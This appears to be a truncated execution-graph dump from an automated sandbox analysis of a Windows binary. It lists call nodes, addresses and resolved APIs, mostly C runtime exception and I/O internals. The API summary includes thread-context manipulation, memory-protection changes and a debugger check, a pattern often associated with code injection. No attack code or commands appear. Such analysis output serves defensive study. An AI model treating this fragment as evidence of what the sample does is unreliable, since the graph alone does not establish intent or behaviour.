execution_graph (interactive graph rendering residue removed; the node list is truncated in the source). Windows APIs visible in the graph nodes:
• Memory and code: VirtualQuery, VirtualAlloc, VirtualProtect, VirtualFree, FlushInstructionCache, GetProcessHeap, HeapFree
• Threads and process: GetThreadContext, SetThreadContext, ResumeThread, GetCurrentThreadId, GetCurrentProcessId, Sleep, SleepEx
• Module loading: LoadLibraryExW, FreeLibrary, GetModuleHandleA, GetProcAddress
• Registry: RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey
• Strings and paths: StrCmpIW, StrCmpW, StrCmpNIW, StrCpyW, StrCatW, lstrlenW, PathCombineW, GetFinalPathNameByHandleW, GetFileType
• Locale and code page: GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, GetStringTypeW, LCMapStringW
• Error handling and debugging: GetLastError, SetLastError, RaiseException, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
• Synchronization and time: InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, FlsGetValue, FlsSetValue, GetSystemTimeAsFileTime, QueryPerformanceCounter
CRT-internal symbols resolved in the graph: __std_exception_copy, _CreateFrameInfo, _invalid_parameter_noinfo, __vcrt_InitializeCriticalSectionEx, __vcrt_uninitialize_locks, __vcrt_uninitialize_ptd, __vcrt_freefls, Concurrency::details::SchedulerProxy::DeleteThis, _log10_special, _raise_exc, _clrfp, __CxxCallCatchBlock, __FrameHandler3::GetHandlerSearchState, __FrameHandler3::FrameUnwindToEmptyState, Is_bad_exception_allowed.
8187->8188 8190 28092389fec _CreateFrameInfo 5 API calls 8187->8190 8187->8191 8189 28092389fec _CreateFrameInfo 5 API calls 8188->8189 8188->8191 8189->8191 8190->8188 8191->8183 8197 28092389dc4 8192->8197 8195 2809238a02c TlsSetValue 8196 2809238a024 8195->8196 8196->8187 8198 28092389e08 __vcrt_InitializeCriticalSectionEx 8197->8198 8203 28092389ede 8197->8203 8199 28092389e36 LoadLibraryExW 8198->8199 8200 28092389ecd GetProcAddress 8198->8200 8198->8203 8204 28092389e79 LoadLibraryExW 8198->8204 8199->8198 8201 28092389ead 8199->8201 8200->8203 8201->8200 8202 28092389ec4 FreeLibrary 8201->8202 8202->8200 8203->8195 8203->8196 8204->8198 8204->8201 9093 28092393d98 9094 28092393da9 CloseHandle 9093->9094 9095 28092393daf 9093->9095 9094->9095 8629 28092387b1c 8630 28092387b40 __scrt_release_startup_lock 8629->8630 8631 2809238b8e5 8630->8631 8632 2809238cfa0 __std_exception_copy 5 API calls 8630->8632 8633 2809238b90e _invalid_parameter_noinfo 8632->8633 8205 2809238da9c 8206 2809238dac1 8205->8206 8215 2809238dad8 8205->8215 8207 2809238d6ac __std_exception_copy 5 API calls 8206->8207 8209 2809238dac6 8207->8209 8208 2809238db90 8255 2809238befc 8208->8255 8210 2809238d570 _invalid_parameter_noinfo 18 API calls 8209->8210 8212 2809238dad1 8210->8212 8215->8208 8219 2809238db68 8215->8219 8222 2809238db25 8215->8222 8235 2809238dce0 8215->8235 8216 2809238dbf0 8218 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8216->8218 8217 2809238dc81 8221 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8217->8221 8220 2809238dbf7 8218->8220 8223 2809238db48 8219->8223 8227 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8219->8227 8220->8223 8226 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8220->8226 8224 2809238dc8c 8221->8224 8222->8223 8230 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8222->8230 8229 2809238d744 
Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8223->8229 8228 2809238dca5 8224->8228 8231 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8224->8231 8225 2809238dc22 8225->8217 8225->8225 8234 2809238dcc7 8225->8234 8261 28092390f50 8225->8261 8226->8220 8227->8219 8232 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8228->8232 8229->8212 8230->8222 8231->8224 8232->8212 8236 2809238dd0e 8235->8236 8236->8236 8237 2809238d6cc __std_exception_copy 5 API calls 8236->8237 8238 2809238dd59 8237->8238 8239 28092390f50 18 API calls 8238->8239 8240 2809238dd8f 8239->8240 8241 2809238e1b4 15 API calls 8240->8241 8242 2809238df46 8241->8242 8270 2809238f5a8 8242->8270 8247 2809238e00d 8248 2809238e1b4 15 API calls 8247->8248 8249 2809238e03d 8248->8249 8250 2809238f5a8 4 API calls 8249->8250 8251 2809238e066 8250->8251 8290 2809238d910 8251->8290 8254 2809238dce0 22 API calls 8256 2809238bf4c 8255->8256 8257 2809238bf14 8255->8257 8256->8216 8256->8225 8257->8256 8258 2809238d6cc __std_exception_copy 5 API calls 8257->8258 8259 2809238bf42 8258->8259 8260 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8259->8260 8260->8256 8266 28092390f6d 8261->8266 8262 28092390f72 8263 28092390f88 8262->8263 8264 2809238d6ac __std_exception_copy 5 API calls 8262->8264 8263->8225 8265 28092390f7c 8264->8265 8267 2809238d570 _invalid_parameter_noinfo 18 API calls 8265->8267 8266->8262 8266->8263 8268 28092390fbc 8266->8268 8267->8263 8268->8263 8269 2809238d6ac __std_exception_copy 5 API calls 8268->8269 8269->8265 8271 2809238f394 4 API calls 8270->8271 8272 2809238df71 8271->8272 8273 2809238d794 8272->8273 8274 2809238d7be 8273->8274 8275 2809238d7e2 8273->8275 8277 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8274->8277 8279 2809238d7cd FindFirstFileExW 8274->8279 8276 2809238d7e7 8275->8276 8282 2809238d83c 8275->8282 8278 2809238d7fc 8276->8278 8276->8279 8280 
2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8276->8280 8277->8279 8281 2809238ca0c 5 API calls 8278->8281 8279->8247 8280->8278 8281->8279 8283 2809238d85f __vcrt_InitializeCriticalSectionEx 8282->8283 8284 2809238d88d 8282->8284 8285 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8282->8285 8283->8279 8307 2809238d620 8283->8307 8286 2809238ca0c 5 API calls 8284->8286 8285->8284 8286->8283 8289 2809238d6ac __std_exception_copy 5 API calls 8289->8279 8291 2809238d93a 8290->8291 8292 2809238d95e 8290->8292 8294 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8291->8294 8296 2809238d949 8291->8296 8293 2809238d964 8292->8293 8300 2809238d9b8 8292->8300 8295 2809238d979 8293->8295 8293->8296 8297 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8293->8297 8294->8296 8298 2809238ca0c 5 API calls 8295->8298 8296->8254 8297->8295 8298->8296 8299 2809238da14 8304 2809238ca0c 5 API calls 8299->8304 8300->8299 8301 2809238d9e3 __vcrt_InitializeCriticalSectionEx 8300->8301 8303 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8300->8303 8301->8296 8302 2809238d620 5 API calls 8301->8302 8305 2809238d9f0 8302->8305 8303->8299 8304->8301 8306 2809238d6ac __std_exception_copy 5 API calls 8305->8306 8306->8296 8308 2809238cfa0 __std_exception_copy 5 API calls 8307->8308 8309 2809238d62d Concurrency::details::SchedulerProxy::DeleteThis 8308->8309 8310 2809238cfa0 __std_exception_copy 5 API calls 8309->8310 8311 2809238d64f 8310->8311 8311->8289 8312 28092394c9f 8313 28092394cb7 8312->8313 8319 28092394d22 8312->8319 8314 28092389634 _CreateFrameInfo 5 API calls 8313->8314 8313->8319 8315 28092394d04 8314->8315 8316 28092389634 _CreateFrameInfo 5 API calls 8315->8316 8317 28092394d19 8316->8317 8320 2809238c6a8 8317->8320 8321 2809238ce28 _invalid_parameter_noinfo 15 API calls 8320->8321 8322 2809238c6b1 _invalid_parameter_noinfo 8321->8322 8323 
28092387a90 8325 28092387a99 __scrt_release_startup_lock 8323->8325 8324 28092387a9d 8325->8324 8327 2809238bf5c 8325->8327 8328 2809238bf7c 8327->8328 8348 2809238bf93 8327->8348 8329 2809238bf9a 8328->8329 8330 2809238bf84 8328->8330 8331 2809238ec90 38 API calls 8329->8331 8332 2809238d6ac __std_exception_copy 5 API calls 8330->8332 8333 2809238bf9f 8331->8333 8334 2809238bf89 8332->8334 8358 2809238e374 GetModuleFileNameW 8333->8358 8336 2809238d570 _invalid_parameter_noinfo 18 API calls 8334->8336 8336->8348 8340 2809238befc 5 API calls 8341 2809238c009 8340->8341 8342 2809238c029 8341->8342 8343 2809238c011 8341->8343 8344 2809238bd34 15 API calls 8342->8344 8345 2809238d6ac __std_exception_copy 5 API calls 8343->8345 8350 2809238c045 8344->8350 8346 2809238c016 8345->8346 8347 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8346->8347 8347->8348 8348->8324 8349 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8349->8348 8351 2809238c077 8350->8351 8353 2809238c090 8350->8353 8356 2809238c04b 8350->8356 8352 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8351->8352 8354 2809238c080 8352->8354 8353->8353 8355 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8353->8355 8357 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8354->8357 8355->8356 8356->8349 8357->8348 8359 2809238e3b9 __vcrt_InitializeCriticalSectionEx 8358->8359 8360 2809238e3cd 8358->8360 8363 2809238d620 5 API calls 8359->8363 8361 2809238e1b4 15 API calls 8360->8361 8362 2809238e3fb 8361->8362 8364 2809238f5a8 4 API calls 8362->8364 8369 2809238e40c 8362->8369 8365 2809238e3c6 8363->8365 8364->8369 8367 28092387940 _log10_special 4 API calls 8365->8367 8368 2809238bfb6 8367->8368 8370 2809238bd34 8368->8370 8376 2809238e258 8369->8376 8373 2809238bd72 8370->8373 8372 2809238bdde 8374 2809238becf 8372->8374 8375 2809238f040 15 API calls 8372->8375 8373->8372 8385 
2809238f040 8373->8385 8374->8340 8375->8372 8378 2809238e27c 8376->8378 8379 2809238e297 8376->8379 8377 2809238e29c 8377->8378 8380 2809238d6ac __std_exception_copy 5 API calls 8377->8380 8378->8365 8379->8377 8381 2809238e2fa __vcrt_InitializeCriticalSectionEx 8379->8381 8380->8378 8381->8378 8382 2809238d620 5 API calls 8381->8382 8383 2809238e307 8382->8383 8384 2809238d6ac __std_exception_copy 5 API calls 8383->8384 8384->8378 8386 2809238efcc 8385->8386 8387 2809238e1b4 15 API calls 8386->8387 8388 2809238eff0 8387->8388 8388->8373 9096 28092382990 9098 280923829e4 9096->9098 9097 280923829ff 9098->9097 9100 28092383130 9098->9100 9101 280923831c6 9100->9101 9103 28092383155 9100->9103 9101->9097 9102 28092383844 StrCmpNIW 9102->9103 9103->9101 9103->9102 9104 28092381ce0 StrCmpIW StrCmpW 9103->9104 9104->9103 9450 28092382a14 9452 28092382a71 9450->9452 9451 28092382a8c 9452->9451 9453 280923831e4 3 API calls 9452->9453 9453->9451 9454 2809238b014 9455 28092389634 _CreateFrameInfo 5 API calls 9454->9455 9456 2809238b049 9455->9456 9457 28092389634 _CreateFrameInfo 5 API calls 9456->9457 9458 2809238b057 __except_validate_context_record 9457->9458 9459 28092389634 _CreateFrameInfo 5 API calls 9458->9459 9460 2809238b09b 9459->9460 9461 28092389634 _CreateFrameInfo 5 API calls 9460->9461 9462 2809238b0a4 9461->9462 9463 28092389634 _CreateFrameInfo 5 API calls 9462->9463 9464 2809238b0ad 9463->9464 9477 28092389c54 9464->9477 9467 28092389634 _CreateFrameInfo 5 API calls 9468 2809238b0dd __CxxCallCatchBlock 9467->9468 9469 28092389c90 __CxxCallCatchBlock 5 API calls 9468->9469 9474 2809238b18e 9469->9474 9470 2809238b1b7 __CxxCallCatchBlock 9471 28092389634 _CreateFrameInfo 5 API calls 9470->9471 9472 2809238b1ca 9471->9472 9473 28092389634 _CreateFrameInfo 5 API calls 9472->9473 9476 2809238b1d3 9473->9476 9474->9470 9475 28092389320 __CxxCallCatchBlock 5 API calls 9474->9475 9475->9470 9478 28092389634 _CreateFrameInfo 5 API calls 9477->9478 9479 
28092389c65 9478->9479 9480 28092389c70 9479->9480 9481 28092389634 _CreateFrameInfo 5 API calls 9479->9481 9482 28092389634 _CreateFrameInfo 5 API calls 9480->9482 9481->9480 9483 28092389c81 9482->9483 9483->9467 9483->9468 9105 28092390388 9106 28092390393 9105->9106 9114 28092392c88 9106->9114 9108 28092390398 9120 28092392d3c 9108->9120 9111 280923903c9 9112 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9111->9112 9113 280923903d5 9112->9113 9119 28092392ca1 9114->9119 9115 28092392d21 9115->9108 9116 28092392cec DeleteCriticalSection 9118 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9116->9118 9118->9119 9119->9115 9119->9116 9124 280923934fc 9119->9124 9121 280923903aa DeleteCriticalSection 9120->9121 9122 28092392d50 9120->9122 9121->9108 9121->9111 9122->9121 9123 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9122->9123 9123->9121 9125 2809239352c 9124->9125 9132 280923933d8 9125->9132 9127 28092393545 9128 2809238c7a0 _invalid_parameter_noinfo 18 API calls 9127->9128 9130 2809239356a 9127->9130 9128->9130 9129 2809239357f 9129->9119 9130->9129 9131 2809238c7a0 _invalid_parameter_noinfo 18 API calls 9130->9131 9131->9129 9133 280923933f3 9132->9133 9134 28092393421 9132->9134 9135 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9133->9135 9137 28092393413 9134->9137 9138 28092393454 9134->9138 9135->9137 9137->9127 9139 2809239346f 9138->9139 9140 28092393494 9138->9140 9141 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9139->9141 9142 2809239348f 9140->9142 9152 28092390100 9140->9152 9141->9142 9142->9137 9145 28092392d3c 5 API calls 9146 280923934b1 9145->9146 9158 2809239064c 9146->9158 9151 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9151->9142 9153 28092390126 9152->9153 9154 28092390157 9152->9154 9153->9154 9155 2809239064c 18 API calls 9153->9155 9154->9145 9156 28092390147 9155->9156 9171 28092392860 9156->9171 9159 28092390655 
9158->9159 9163 28092390665 9158->9163 9160 2809238d6ac __std_exception_copy 5 API calls 9159->9160 9161 2809239065a 9160->9161 9162 2809238d570 _invalid_parameter_noinfo 18 API calls 9161->9162 9162->9163 9164 28092393eec 9163->9164 9165 28092393f18 9164->9165 9166 280923934c3 9164->9166 9167 28092393f7c 9165->9167 9169 28092393f48 9165->9169 9166->9142 9166->9151 9168 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9167->9168 9168->9166 9260 28092393e74 9169->9260 9173 280923928b6 9171->9173 9177 28092392889 9171->9177 9172 280923928cf 9174 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9172->9174 9173->9172 9175 28092392926 9173->9175 9174->9177 9175->9177 9178 28092392980 9175->9178 9177->9154 9179 280923929ab 9178->9179 9201 280923929df __vcrt_InitializeCriticalSectionEx 9178->9201 9180 280923929b0 9179->9180 9182 28092392a1e 9179->9182 9181 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9180->9181 9181->9201 9183 28092392a34 9182->9183 9204 28092393394 9182->9204 9210 28092392d80 9183->9210 9186 28092392b5c 9187 28092392b6e 9186->9187 9188 28092392bc0 WriteFile 9186->9188 9189 28092392bac 9187->9189 9190 28092392b76 9187->9190 9188->9201 9239 280923924d0 9189->9239 9192 28092392b98 9190->9192 9193 28092392b7b 9190->9193 9191 28092392a40 9191->9186 9194 28092392a8f GetConsoleMode 9191->9194 9233 280923926f0 9192->9233 9193->9201 9227 280923925d4 9193->9227 9194->9186 9197 28092392aaa 9194->9197 9199 28092392b39 9197->9199 9203 28092392ab6 9197->9203 9218 28092392058 GetConsoleOutputCP 9199->9218 9201->9177 9202 2809239339c CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 9202->9203 9203->9201 9203->9202 9205 280923932e8 9204->9205 9245 28092391ec0 9205->9245 9208 28092393326 SetFilePointerEx 9209 28092393315 __vcrt_InitializeCriticalSectionEx 9208->9209 9209->9183 9211 28092392d89 9210->9211 9213 28092392d96 9210->9213 9212 2809238d6ac __std_exception_copy 5 API calls 9211->9212 9214 28092392d8e 9212->9214 9213->9214 9215 2809238d6ac 
__std_exception_copy 5 API calls 9213->9215 9214->9191 9216 28092392dcd 9215->9216 9217 2809238d570 _invalid_parameter_noinfo 18 API calls 9216->9217 9217->9214 9224 280923920ec 9218->9224 9219 28092387940 _log10_special 4 API calls 9220 280923924b2 9219->9220 9220->9201 9221 280923904d4 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 9221->9224 9222 28092392420 __vcrt_InitializeCriticalSectionEx 9222->9219 9223 28092392e24 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 9223->9224 9224->9221 9224->9222 9224->9223 9225 28092392388 WriteFile 9224->9225 9226 280923923c8 WriteFile 9224->9226 9225->9222 9225->9224 9226->9222 9226->9224 9231 280923925ec 9227->9231 9228 28092387940 _log10_special 4 API calls 9229 280923926d5 9228->9229 9229->9201 9230 2809239267b WriteFile 9230->9231 9232 280923926b8 __vcrt_InitializeCriticalSectionEx 9230->9232 9231->9230 9231->9232 9232->9228 9234 2809239270c 9233->9234 9237 28092392829 __vcrt_InitializeCriticalSectionEx 9234->9237 9238 280923927e6 WriteFile 9234->9238 9235 28092387940 _log10_special 4 API calls 9236 28092392844 9235->9236 9236->9201 9237->9235 9238->9234 9238->9237 9241 280923924e8 9239->9241 9240 28092387940 _log10_special 4 API calls 9242 280923925ba 9240->9242 9243 28092392566 WriteFile 9241->9243 9244 2809239259d __vcrt_InitializeCriticalSectionEx 9241->9244 9242->9201 9243->9241 9243->9244 9244->9240 9246 28092391ec9 9245->9246 9247 28092391ede 9245->9247 9257 2809238d68c 9246->9257 9249 2809238d68c 5 API calls 9247->9249 9254 28092391ed6 9247->9254 9251 28092391f19 9249->9251 9253 2809238d6ac __std_exception_copy 5 API calls 9251->9253 9252 2809238d6ac __std_exception_copy 5 API calls 9252->9254 9255 28092391f21 9253->9255 9254->9208 9254->9209 9256 2809238d570 _invalid_parameter_noinfo 18 API calls 9255->9256 9256->9254 9258 2809238cfa0 __std_exception_copy 5 API calls 9257->9258 9259 2809238d695 9258->9259 9259->9252 9261 28092393e90 
9260->9261 9263 28092393ec5 9261->9263 9264 28092393fb0 9261->9264 9263->9166 9265 28092391ec0 18 API calls 9264->9265 9268 28092393fcc 9265->9268 9266 28092393fd2 __vcrt_InitializeCriticalSectionEx 9276 28092391e04 9266->9276 9268->9266 9269 28092391ec0 18 API calls 9268->9269 9275 2809239400f 9268->9275 9271 28092394002 9269->9271 9270 28092391ec0 18 API calls 9272 2809239401b CloseHandle 9270->9272 9274 28092391ec0 18 API calls 9271->9274 9272->9266 9273 28092394037 9273->9263 9274->9275 9275->9266 9275->9270 9277 28092391e20 9276->9277 9278 28092391e92 9276->9278 9277->9278 9282 28092391e53 9277->9282 9279 2809238d6ac __std_exception_copy 5 API calls 9278->9279 9280 28092391e97 9279->9280 9281 2809238d68c 5 API calls 9280->9281 9283 28092391e84 9281->9283 9282->9283 9284 28092391e7c SetStdHandle 9282->9284 9283->9273 9284->9283 8389 2809238588c 8391 28092385893 8389->8391 8390 280923858c0 VirtualProtect 8392 280923858e9 GetLastError 8390->8392 8393 280923857d0 8390->8393 8391->8390 8391->8393 8392->8393 8394 2809239148c 8395 2809239149e 8394->8395 8396 280923914c5 8395->8396 8398 280923914de 8395->8398 8397 2809238d6ac __std_exception_copy 5 API calls 8396->8397 8399 280923914ca 8397->8399 8400 280923914d5 8398->8400 8402 2809238e1b4 15 API calls 8398->8402 8401 2809238d570 _invalid_parameter_noinfo 18 API calls 8399->8401 8401->8400 8402->8400 8403 2809238fa8c 8404 2809238fa98 8403->8404 8405 2809238fabf 8404->8405 8407 28092391cbc 8404->8407 8408 28092391cfc 8407->8408 8409 28092391cc1 8407->8409 8408->8404 8410 28092391ce2 DeleteCriticalSection 8409->8410 8411 28092391cf4 8409->8411 8410->8410 8410->8411 8412 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8411->8412 8412->8408 9285 2809238c58c 9286 2809238c5a5 9285->9286 9287 2809238c5bd 9285->9287 9286->9287 9288 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9286->9288 9288->9287 8634 2809238b10e 8635 28092389634 _CreateFrameInfo 5 API calls 8634->8635 
8637 2809238b11b __CxxCallCatchBlock 8635->8637 8636 2809238b15f RaiseException 8638 2809238b186 8636->8638 8637->8636 8647 28092389c90 8638->8647 8641 28092389634 _CreateFrameInfo 5 API calls 8642 2809238b1ca 8641->8642 8643 28092389634 _CreateFrameInfo 5 API calls 8642->8643 8645 2809238b1d3 8643->8645 8646 2809238b1b7 __CxxCallCatchBlock 8646->8641 8648 28092389634 _CreateFrameInfo 5 API calls 8647->8648 8649 28092389ca2 8648->8649 8650 28092389cdd 8649->8650 8651 28092389634 _CreateFrameInfo 5 API calls 8649->8651 8652 28092389cad 8651->8652 8652->8650 8653 28092389634 _CreateFrameInfo 5 API calls 8652->8653 8654 28092389cce 8653->8654 8654->8646 8655 28092389320 8654->8655 8656 28092389634 _CreateFrameInfo 5 API calls 8655->8656 8657 2809238932e 8656->8657 8657->8646 8413 28092394e83 8416 28092389374 8413->8416 8417 2809238938c 8416->8417 8418 2809238939e 8416->8418 8417->8418 8419 28092389394 8417->8419 8420 28092389634 _CreateFrameInfo 5 API calls 8418->8420 8421 28092389634 _CreateFrameInfo 5 API calls 8419->8421 8426 2809238939c 8419->8426 8422 280923893a3 8420->8422 8423 280923893c3 8421->8423 8424 28092389634 _CreateFrameInfo 5 API calls 8422->8424 8422->8426 8425 28092389634 _CreateFrameInfo 5 API calls 8423->8425 8424->8426 8427 280923893d0 8425->8427 8428 2809238c6a8 15 API calls 8427->8428 8429 280923893d9 8428->8429 8430 2809238c6a8 15 API calls 8429->8430 8431 280923893e5 8430->8431 8658 2809238ad78 8659 2809238ada5 __except_validate_context_record 8658->8659 8660 28092389634 _CreateFrameInfo 5 API calls 8659->8660 8663 2809238adaa 8660->8663 8661 2809238ae04 8665 2809238ae7f 8661->8665 8672 2809238ae58 8661->8672 8673 2809238ae26 __GetCurrentState 8661->8673 8662 2809238ae92 8669 2809238aeb1 8662->8669 8694 28092389ce4 8662->8694 8663->8661 8663->8662 8663->8672 8664 2809238af00 8664->8672 8700 2809238a544 8664->8700 8687 280923898e0 8665->8687 8669->8664 8669->8672 8697 28092389cf8 8669->8697 8670 2809238afa9 8673->8670 8675 2809238b288 
8673->8675 8676 28092389ce4 Is_bad_exception_allowed 5 API calls 8675->8676 8677 2809238b2b7 __GetCurrentState 8676->8677 8678 28092389634 _CreateFrameInfo 5 API calls 8677->8678 8683 2809238b2d4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8678->8683 8679 2809238b3cb 8680 28092389634 _CreateFrameInfo 5 API calls 8679->8680 8681 2809238b3d0 8680->8681 8682 28092389634 _CreateFrameInfo 5 API calls 8681->8682 8684 2809238b3db __FrameHandler3::GetHandlerSearchState 8681->8684 8682->8684 8683->8679 8683->8684 8685 28092389ce4 5 API calls Is_bad_exception_allowed 8683->8685 8757 28092389d0c 8683->8757 8684->8672 8685->8683 8760 28092389944 8687->8760 8689 280923898ff __FrameHandler3::ExecutionInCatch 8764 28092389850 8689->8764 8692 2809238b288 __FrameHandler3::FrameUnwindToEmptyState 5 API calls 8693 28092389934 8692->8693 8693->8672 8695 28092389634 _CreateFrameInfo 5 API calls 8694->8695 8696 28092389ced 8695->8696 8696->8669 8698 28092389634 _CreateFrameInfo 5 API calls 8697->8698 8699 28092389d01 8698->8699 8699->8664 8768 2809238b414 8700->8768 8702 2809238aa12 8703 2809238a963 8703->8702 8744 2809238a961 8703->8744 8821 2809238aa1c 8703->8821 8704 2809238a68b 8704->8703 8716 2809238a6c3 8704->8716 8706 28092389634 _CreateFrameInfo 5 API calls 8707 2809238a9a5 8706->8707 8707->8702 8712 28092387940 _log10_special 4 API calls 8707->8712 8708 2809238a894 8713 2809238a8b1 8708->8713 8715 28092389ce4 Is_bad_exception_allowed 5 API calls 8708->8715 8708->8744 8709 28092389634 _CreateFrameInfo 5 API calls 8711 2809238a5f2 8709->8711 8711->8707 8717 28092389634 _CreateFrameInfo 5 API calls 8711->8717 8714 2809238a9b8 8712->8714 8720 2809238a8d3 8713->8720 8713->8744 8814 280923898b4 8713->8814 8714->8672 8715->8713 8716->8708 8729 28092389cf8 LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress TlsSetValue 8716->8729 8793 2809238ac38 8716->8793 8807 2809238a470 8716->8807 8719 2809238a602 8717->8719 8721 28092389634 _CreateFrameInfo 5 API calls 
8719->8721 8722 2809238a8e9 8720->8722 8720->8744 8754 2809238a9f5 8720->8754 8723 2809238a60b 8721->8723 8724 2809238a8f4 8722->8724 8728 28092389ce4 Is_bad_exception_allowed 5 API calls 8722->8728 8779 28092389d24 8723->8779 8731 2809238b4ac 5 API calls 8724->8731 8725 28092389634 _CreateFrameInfo 5 API calls 8727 2809238a9fb 8725->8727 8730 28092389634 _CreateFrameInfo 5 API calls 8727->8730 8728->8724 8729->8716 8732 2809238aa04 8730->8732 8734 2809238a90b 8731->8734 8736 2809238c6a8 15 API calls 8732->8736 8738 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8734->8738 8734->8744 8735 28092389634 _CreateFrameInfo 5 API calls 8737 2809238a64d 8735->8737 8736->8702 8737->8704 8740 28092389634 _CreateFrameInfo 5 API calls 8737->8740 8739 2809238a925 8738->8739 8818 28092389b50 RtlUnwindEx 8739->8818 8742 2809238a659 8740->8742 8745 28092389634 _CreateFrameInfo 5 API calls 8742->8745 8744->8706 8746 2809238a662 8745->8746 8782 2809238b4ac 8746->8782 8750 2809238a676 8789 2809238b59c 8750->8789 8752 2809238a9ef 8753 2809238c6a8 15 API calls 8752->8753 8753->8754 8754->8725 8755 2809238a67e __CxxCallCatchBlock std::bad_alloc::bad_alloc 8755->8752 8833 280923894a0 8755->8833 8758 28092389634 _CreateFrameInfo 5 API calls 8757->8758 8759 28092389d1a 8758->8759 8759->8683 8762 28092389972 __FrameHandler3::ExecutionInCatch 8760->8762 8761 2809238999e RtlLookupFunctionEntry 8761->8762 8762->8761 8763 280923899e2 8762->8763 8763->8689 8766 2809238986e 8764->8766 8765 2809238989b 8765->8692 8766->8765 8767 28092389634 _CreateFrameInfo 5 API calls 8766->8767 8767->8766 8769 2809238b439 __FrameHandler3::ExecutionInCatch 8768->8769 8770 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8769->8770 8771 2809238b44e 8770->8771 8838 2809238a0cc 8771->8838 8774 2809238b460 __FrameHandler3::GetHandlerSearchState 8841 2809238a104 8774->8841 8775 2809238b483 8776 2809238a0cc __GetUnwindTryBlock RtlLookupFunctionEntry 8775->8776 8778 2809238a5a6 8776->8778 8778->8702 
8778->8704 8778->8709 8780 28092389634 _CreateFrameInfo 5 API calls 8779->8780 8781 28092389d32 8780->8781 8781->8702 8781->8735 8783 2809238b593 8782->8783 8786 2809238b4d7 8782->8786 8784 2809238a672 8784->8704 8784->8750 8785 28092389cf8 LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress TlsSetValue 8785->8786 8786->8784 8786->8785 8787 28092389ce4 Is_bad_exception_allowed 5 API calls 8786->8787 8788 2809238ac38 5 API calls 8786->8788 8787->8786 8788->8786 8791 2809238b5b9 Is_bad_exception_allowed 8789->8791 8792 2809238b609 8789->8792 8790 28092389ce4 5 API calls Is_bad_exception_allowed 8790->8791 8791->8790 8791->8792 8792->8755 8794 2809238ac65 8793->8794 8805 2809238acf4 8793->8805 8795 28092389ce4 Is_bad_exception_allowed 5 API calls 8794->8795 8796 2809238ac6e 8795->8796 8797 28092389ce4 Is_bad_exception_allowed 5 API calls 8796->8797 8798 2809238ac87 8796->8798 8796->8805 8797->8798 8799 2809238acb3 8798->8799 8800 28092389ce4 Is_bad_exception_allowed 5 API calls 8798->8800 8798->8805 8801 28092389cf8 5 API calls 8799->8801 8800->8799 8802 2809238acc7 8801->8802 8803 2809238ace0 8802->8803 8804 28092389ce4 Is_bad_exception_allowed 5 API calls 8802->8804 8802->8805 8806 28092389cf8 5 API calls 8803->8806 8804->8803 8805->8716 8806->8805 8808 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8807->8808 8809 2809238a4ad 8808->8809 8810 28092389ce4 Is_bad_exception_allowed 5 API calls 8809->8810 8811 2809238a4e5 8810->8811 8812 28092389b50 5 API calls 8811->8812 8813 2809238a529 8812->8813 8813->8716 8815 280923898c8 __FrameHandler3::ExecutionInCatch 8814->8815 8816 28092389850 __FrameHandler3::ExecutionInCatch 5 API calls 8815->8816 8817 280923898d2 8816->8817 8817->8720 8819 28092387940 _log10_special 4 API calls 8818->8819 8820 28092389c4a 8819->8820 8820->8744 8822 2809238aa52 8821->8822 8827 2809238aac0 8821->8827 8823 28092389634 _CreateFrameInfo 5 API calls 8822->8823 8824 2809238aa57 8823->8824 8825 2809238aa66 EncodePointer 8824->8825 
